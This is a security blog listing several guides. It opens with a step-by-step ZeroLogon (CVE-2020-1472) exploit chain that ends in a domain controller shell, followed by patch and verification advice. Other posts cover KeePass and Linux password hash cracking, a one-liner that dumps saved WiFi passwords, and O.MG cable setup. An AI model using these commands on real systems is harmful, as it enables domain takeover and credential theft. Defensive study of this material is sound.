Guides - TzuSec.com

ZeroLogon – How to Exploit and Mitigate

Posted on 2020-10-062020-10-14 by Rickard

Information about vulnerability

The vulnerability I will discuss in this post it the famous ZeroLogon vulnerability(CVE-2020-1472). By exploiting the vulnerability any attacker with network access to domain controller can take complete control of a windows domain very quick and easy.

I will start off by showing you how easy you can exploit the vulnerability. Then I will continue by showing you how you can protect your domain controllers and finally I will show you how you can verify that your domain controllers have the correct fixes in place.

How to exploit the vulnerability

We will use the script by Risksense to exploit the vulnerability. To be able to run it you will need to have the Impacket library installed on your machine. If you don’t have it installed you can simply install it by following the steps below.

cd /opt/ git clone https://github.com/SecureAuthCorp/impacket.git cd impacket/ pip3 install . python3 setup.py install

We will then download the ZeroLogon script from Risksense.

cd /opt
git clone https://github.com/risksense/zerologon.git
cd zerologon/

Now it’s time to exploit. We need the name of the domain, the name of the DC and the IP address. For this example we will use the following information for this made up target:

Name of domain: LETMEIN
Name of DC: SECRET-DC
IP address of DC: 192.168.1.10

Run the script:

python3 set_empty_pw.py SECRET-DC 192.168.1.10

The DC should now have an empty string as its machine password. You can now use a tool of your choice to get out the info you want from the DC. You can for example use secretsdump.py that is included in the impacket library.

Dump credentials:
secretdump.py -just-dc LETMEIN/SECRET-DC\$192.168.1.10

Then press enter when prompted for password since it is supposed to be empty and voila. You should now see the user hashes from the NTDS.DIT.

Now you can easily find a Domain Admin like for example “LETMEIN\Administrator” and use another tool to create a shell. We will use another impacket tool for that, wmiexec.py. So all you need to do is to copy the hash that you got from secretdump.py.

Create shell to domain controller:
wmiexec.py LETMEIN\Administrator@192.168.1.10 -hashes *hashfromsecretdump.py*

You now have a shell on the domain controller. You own it and can do what you want.

Microsofts fix for this vulnerability

So, how can we now mitigate that a hacker exploits this in our own domain? Microsoft released information on how you can fix this. The first step is to install the patch and then set the FullSecureChannelProtection registry key to 1.

Instructions can be found on Microsofts website:
https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

Hopefully you already installed the patches back in august and applied the reg key the same day as Microsoft sent out the information.

How to verify the fix

How can you make sure that you did everything right while applying Microsofts fixes? To test it you can use the Zerologon tester script by Secura. The script also uses Impacket library to test if the vulnerability remains.

How to install:
cd /opt git clone https://github.com/SecuraBV/CVE-2020-1472.git cd CVE-2020-1472 pip install -r requirements.txt

Run the script:
zerologon_tester.py SECRET-DC 192.168.1.10

That’s it, a super critical vulnerability that is extremely easy to exploit. Make sure that you always patch your stuff and do it quickly. ASAP is not enough 🙂

If you have any questions you can contact me on twitter (@tzusec).
// Rickard

How to Backup and Restore phpIPAM

Posted on 2020-10-03 by Rickard

phpIPAM is an awesome IP address management application. I have used it for many years and really like it. In this guide I will show you how you can schedule automatic backups of your IPAM and how you easily can restore the database if something goes wrong.

Schedule automatic backups

Create backup folder
mkdir /mnt/backups/phpipam/db/
Create a file for your credentials
This is done to prevent the credentials to be stored in clear text inside crontab.
touch ~/.msql.cnf
vim ~/.msql.cnf
#[mysqldump]
#user=root #password=*yoursupersecretpassword*
Restrict permissions to file
chmod 600 ~/.msql.cnf
Add to cron – backup the database every day at 23:00
crontab -e
0 23 * * * mysqldump --defaults-file=~/.msql.cnf phpipamdb01 > /mnt/backups/phpipam/db/phpipamdb01_$(date +"%F")_bak.sql

Remove old backups

You can easily remove your old backups (30 days+) by running the command below.
find /mnt/backups/phpipam/db/ -ctime +30 -delete

So what you can do is just adding that command to crontab like I showed you in the example above. But I personally don’t like that approach because if someone changes the date/time on your server there is a risk that all of the backups gets removed and you don’t want to risk that. To make sure that the time is configured correctly you can first verify that NTP is synchronized before you remove the old backup files. (This of course assumes that your NTP servers provides you with the correct time) You can create a simple bash script that will verify that NTP is being synchronized and if it’s not synchronized you will get notified by email:

Create the script
vim rm-old-backups.sh
# #!/bin/bash # #Simple script to remove old phpIPAM backups if NTP i synced. # #By: Rickard Carlsson (@tzusec) # #IF NTP WORKS THEN REMOVE FILES # if (ntpstat | grep -qF "synchronized to NTP server") # then #_____find /mnt/backups/phpipam/db/ -ctime +30 -delete # else # ____mail -s "NTP-error - Backups won't be deleted" rickard@tzusec.com <<< 'NTP wasn't synced so no old backups were removed.' # fi
Make the script executable
chmod +x rm-old-backups.sh
Verify that it works as expected
Manually run the script to make sure that is works as you want.
Add it to cron – remove old backups once every day at 23:30
crontab -e
30 23 * * * /root/rm-old-backups.sh

Restore database

Locate the backup you want to use
ls -l /mnt/backups/phpipam/db/
Restore the database from the backup
mysql -u root -p phpipamdb01 < /mnt/backups/phpipam/db/phpipamdb01_*DATE*_bak.sql

I hope this guide was useful for you. Reach out to me on twitter @tzusec if you have any questions.

Cracking KeePass Database

Posted on 2020-06-07 by Rickard

In this post I will describe how you can crack a KeePass Database file (.kdbx) in an easy way. Or to be correct we are not cracking the DB, we are cracking the password hash.

To demonstrate this I created a new database that I called “SecretDB.kdbx” and our mission will be to find out which master password I chose for the database.

Keepass-DB-file

To be able to crack the hash we will need to extract and save it and that can be done with the John the ripper utility tool “keepass2john“. It comes with Kali Linux so you don’t have to install it.

What you do to extract the hash is really simple, you just run:
keepass2john SecretDB.kdbx

You can also send the output to a file by adding “>” like I did in the screenshot below.

keepass2john SecretDB.kdbx > Keepasshash.txt

keepass2john-screenshot

We now have our hash ready to be cracked. In this example we will try to crack it using a dictionary and John the ripper. I used a modified version of rockyou.txt as dictionary. You can also use other great cracking tools like hashcat but I went with john here.

We run john and specify our custom wordlist with “–wordlist” parameter and then define our hash file.

john --wordlist=rockyou.txt KeepassHash.txt

We then just let it run for some time and as soon as we crack the hash it will be displayed. As you can see in the screenshot we did crack the hash and the password of this SecretDB.kdbx-database was “SuperSecretPassword2020”.

I hope you found this post useful and make sure to not use weak password for your database.

// Rickard

How to crack hashes with John the Ripper – Linux

Posted on 2020-05-03 by Rickard

In this post I will show you how you can crack passwords with John the Ripper. We will start off by collecting the hashes from a linux machine, then use the tool unshadow and at last crack the hashes with John the Ripper.

1 – Collect hashes from a Linux machine
We will start with collecting the hashes from the target machine. We will need both /etc/passwd and /etc/shadow. Save them to your Kali Linux machine, preferably on the desktop. It can be done with the following commands.
cat /etc/passwd > ~/Desktop/passwd.txt

cat /etc/shadow > ~/Desktop/shadow.txt

2 – Combine passwd and shadow with unshadow
Now we need to combine these two files into one. This can be done with the tool unshadow.
unshadow passwd.txt shadow.txt > hashtocrack.txt

3 – Crack with John
Now we are ready to crack the hashes. John can run in different modes. You can use wordlists or straight brute force. The method I will use in this example is wordlist mode since that is the most effective way. Brute forcing takes a lot of time and I recommend you to only use it as a last resort when your wordlists won’t crack the hashes. In this example we define the wordlist to use to the built in rockyou.txt.
john --wordlist=/usr/share/wordlists/rockyou.txt hashtocrack.txt

4 – Show cracked credentials
If you let john run you will be prompted with the credentials as soon as they have been cracked. In this example we can see that the the password for the user SuperAdmin was Password1.

We can also come back at a later time and check the credentials again by defining the unshadowed file and add the parameter –show.

john hashtocrack.txt --show

//Rickard

Grab All WiFi Passwords with just One Line of Code

Posted on 2020-04-112020-04-11 by Rickard

I just released a new video on my Youtube channel. The video will show you how you easily can grab SSID and password to all wireless that your Windows computer remember with a oneliner.

The command first lists all wlan profiles and then saves the SSID to a variable ($name). After that the password is gathered for each SSID and the password is saved to the variable $pass. After that a custom object is created were each SSID and password are being saved to a table.

The command to run in Powershell:
(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | % {(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ SSID=$name;PASSWORD=$pass }} | Format-Table -AutoSize

It’s always great to have a oneliner for things like this. I used this method in one of my scripts that I show in the video “Grab login credentials with a BadUSB”.

//Rickard

O.MG-CABLE – How To Get Started

Posted on 2020-02-022020-02-02 by Rickard

This guide will help you get started with the O.MG-cable. When you open your package it should include three things:

A card with instructions
The programmer
The OMG-cable

If you read the instruction card you will see that you can find instructions on how to get started at https://o.mg.lol/setup. You will there find a link to the Github project where you can download the latest firmware that we will use to flash the cable.

Download the firmware by clicking on the link to the .zip-file. You will then need to unzip the file and you can do that by navigating to your download folder and run:
unzip O.MG_cable-Firmware_v1.4.0.zip

Then move into the new folder and you will see the following files.

The next step is to plug in the programmer in your computer and then plug in the cable into the programmer. You are now ready to flash your cable and you do that by running the flash_linux:

./flash_linux

You will be able to either program it into Station or Access Point mode. In this case just go by default (AP mode) by pressing Enter. When the flashing is done you are ready to use the cable.

Disconnect the programmer from your computer and plug in your cable. Wait for ~60 seconds and then connect to the cable via WiFi with the default credentials above. When you are connected to the cables wireless network you can open a web browser and browse to http://192.168.4.1 and you will get to the UI.

Now you are ready to run your first scripts. Good luck!

// Rickard

How to use Undercover-mode in Kali Linux

Posted on 2020-01-292020-01-29 by Rickard

Yesterday a new version of Kali Linux were released, Kali 2020.1. You can download it here. Make sure that you have read the release notes to make sure that you don’t break anything you don’t want.

Upgrade your existing machine:

Run sudo apt full-upgrade -y
Wait for the job to finish.
Verify that you got the new version by running
cat /etc/os-release

How to use undercover mode in Kali Linux 2020.1:
Undercover mode is a new feature for version 2020.1 that will help you hide that you are a super elite hacker when you are out in public by temporarily changing the desktop to look like a Windows 10 machine. I’m not sure I see the real use cases for this but it’s actually a funny feature. To use it you just need to run kali-undercover.

After a few seconds you will see a Windows 10-like appearance, pretty cool.

Httprobe

Posted on 2020-01-212020-01-20 by Rickard

This post is about httprobe which is a tool for quickly probing for active http and https servers. If you have a list with subdomains you can quickly check which are active by using this tool. Httprobe is available on Github and the tool was created by Tom Hudson (@tomnomnom on Twitter).

Pre requisites:
1. You need to have Golang installed. If you haven’t used golang before and need help to get started, read my guide on how to install Golang on Kali Linux

2. Download ‘httprobe’ by running
go get -u github.com/tomnomnom/httprobe

3. If you used my guide to install Go you can now find ‘httprobe’ at:
/root/go-workspace/bin/assetfinder

Basic usage:
To use httprobe you need to print out your domains and pipe them to httprobe. In the example below we are are using cat to read the data from domains.txt and gives its content as output to httprobe.
cat domains.txt | httprobe

Adding extra ports:
By default httprobe is probing for http on port 80 and https on port 443. We can add other ports by using the ‘-p’ parameter.
cat domains.txt | httprobe -p http:8080 -p https:8443

Skip default ports and only probe for defined ports:
By adding ‘-s’ parameter the default ports will be ignored.
cat domains.txt | httprobe -s -p http:8080 -p https:8443

Specify a timeout:
If you know that the response time on the target server might be high you can specify a custom timeout by using the ‘-t’ parameter. The time is configured in milliseconds.
cat domains.txt | httprobe -t 10000

Combine with other tools:
You can combine ‘httprobe’ with other tools such as ‘assetfinder’. If you don’t know about assetfinder you can read my earlier post that helps you getting started with assetfinder.

One example on how you can chain assetfinder with httprobe.
assetfinder --subs-only yahoo.com | httprobe -s -p http:80
In the example we first searched for subdomains at yahoo.com and piped the result to httprobe to find out which of the subdomains that were listening on port 80.
assetfinder+httprobe

Assetfinder

Posted on 2020-01-202020-01-19 by Rickard

In this post I will write a bit about Assetfinder which is an quick and awesome tool for finding subdomains. The tool is available in Github and was created by Tom Hudson (@tomnomnom on Twitter).

According to the information on Github, Assetfinder uses the following resources to find subdomains

crt.sh
certspotter
hackertarget
threatcrowd
wayback machine
dns.bufferover.run
facebook
virustotal
findsubdomains

Pre requisites:
1. You need to have Golang installed. If you haven’t used golang before and need help to get started, read my guide on how to install Golang on Kali Linux

2. Download assetfinder by running the following command.
go get -u github.com/tomnomnom/assetfinder

3. If you used my guide to install Go you can now find assetfinder at:
/root/go-workspace/bin/assetfinder

How to use Assetfinder:
Navigate to assetfinder and run
./assetfinder exampledomain.com
If you only want the subdomains you can add –subs-only.
./assetfinder --subs-only exampledomain.com

Save the output to a file:
You can also save the output to a file by adding “> filename”
./assetfinder --subs-only exampledomain.com > domains

Assetfinder - Save output

The tool is really quick so it is perfect to use it when you want a fast way to find subdomains for a target company. I really love this tool. <3

How to Install Golang in Kali Linux

Posted on 2020-01-192020-03-01 by Rickard

Golang (Go) is a programming language that are becoming more and more popular and I have seen many interesting tools that are written in Go. Since Go are not being installed by default in Kali Linux I thought that publishing a quick-start guide could be a good idea.

Start by open your web browser and visit https://golang.org/dl/
Download the latest version for Linux – “gox.xx.x.linux-amd64.tar.gz”
Open your terminal and navigate to your downloads folder
cd /root/Downloads
Extract the files
tar -C /usr/local/ -xzf go1.13.6.linux-amd64.tar.gz
Add variables for GO by modifying “~/.bashrc”
vim ~/.bashrc
Add the following paths to the end of the file
export GOPATH=/root/go-workspace export GOROOT=/usr/local/go PATH=$PATH:$GOROOT/bin/:$GOPATH/bin
Now we need to refresh the bashrc to get the updated variables
source ~/.bashrc
Now we just need to verify that everything is correct configured and we can do that by creating a simple ‘hello world’ program in Go.
vim helloworld.go
Add the following code to the file:
package main import "fmt" func main() { fmt.Printf("Hello world!\n") }Then save the file and try to run the program:
go run helloworld.go
If everything was configured correctly you should see something like this:

You are now ready to use Golang on your Kali Linux machine!